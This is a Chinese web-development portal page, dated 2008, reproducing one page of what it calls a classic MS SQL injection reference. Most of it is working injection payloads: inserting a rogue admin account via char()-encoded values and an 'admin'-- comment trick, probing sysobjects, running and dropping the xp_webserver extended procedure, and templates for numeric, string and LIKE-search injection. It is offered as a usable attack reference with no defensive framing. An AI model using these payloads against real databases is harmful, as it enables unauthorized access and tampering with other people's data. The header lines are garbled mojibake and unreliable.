WEB开发网      濠靛倻鏅悵顖涚附閽樺鐎诲ù婊庡亾缁辨帗鎷呴悩鍨暠濞戞挴鍋撳ù鐘烘閸ㄥ孩绂嶉锝喰﹂柟瀛樺灣濠婃垿鎯冮崟顏嗩伇濞寸姾妫勬慨鈺呭礉濞戝磭骞㈤悹鍥у槻閸ㄥ孩绂嶉敓锟� ---闁挎洩鎷�
开发学院数据库MySQL 非常经典的Ms Sql注射资料 阅读

非常经典的Ms Sql注射资料

 2008-10-04 11:10:32 来源:WEB开发网 闁靛棴鎷�闁告垵绻愰惃顒傗偓娑欍仦缂嶏拷濠⒀呭仜閵囧洨鈧稒銇炵紞锟�闁靛棴鎷�  闁稿繗娅曢弫鐐哄级閵婏缚鑸瀣仧濞堟垵顕ラ鐓庤Е
核心提示: execxp_webserver一旦这个扩展存储执行过,可以这样删除它:sp_dropextendedproc'xp_webserver'insertintousersvalues(666,char(0x63)+char(0x68)+char(0x72)+char(0x69

execxp_webserver

一旦这个扩展存储执行过,可以这样删除它:

sp_dropextendedproc'xp_webserver'
insertintousersvalues(666,char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),0xffff)-
insertintousersvalues(667,123,123,0xffff)-
insertintousersvalues(123,'admin''--','password',0xffff)-
;anduser>0
;;and(selectcount(*)fromsysobjects)>0
;;and(selectcount(*)frommysysobjects)>0//为access数据库

-----------------------------------------------------------通常注射的一些介绍:

A)ID=49这类注入的参数是数字型,SQL语句原貌大致如下:

select*from表名where字段=49

注入的参数为ID=49And[查询条件],即是生成语句:

select*from表名where字段=49And[查询条件]

(B)Class=连续剧这类注入的参数是字符型,SQL语句原貌大致概如下:

select*from表名where字段='连续剧'

注入的参数为Class=连续剧'and[查询条件]and''=',即是生成语句:

select*from表名where字段='连续剧'and[查询条件]and''=''

(C)搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:

select*from表名where字段like'%关键字%'

注入的参数为keyword='and[查询条件]and'%25'=',即是生成语句:

select*from表名where字段like'%'and[查询条件]and'%'='%'

上一页  1 2 3 4 5 6 7 8 9 10  下一页

Tags:非常 经典 Ms

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接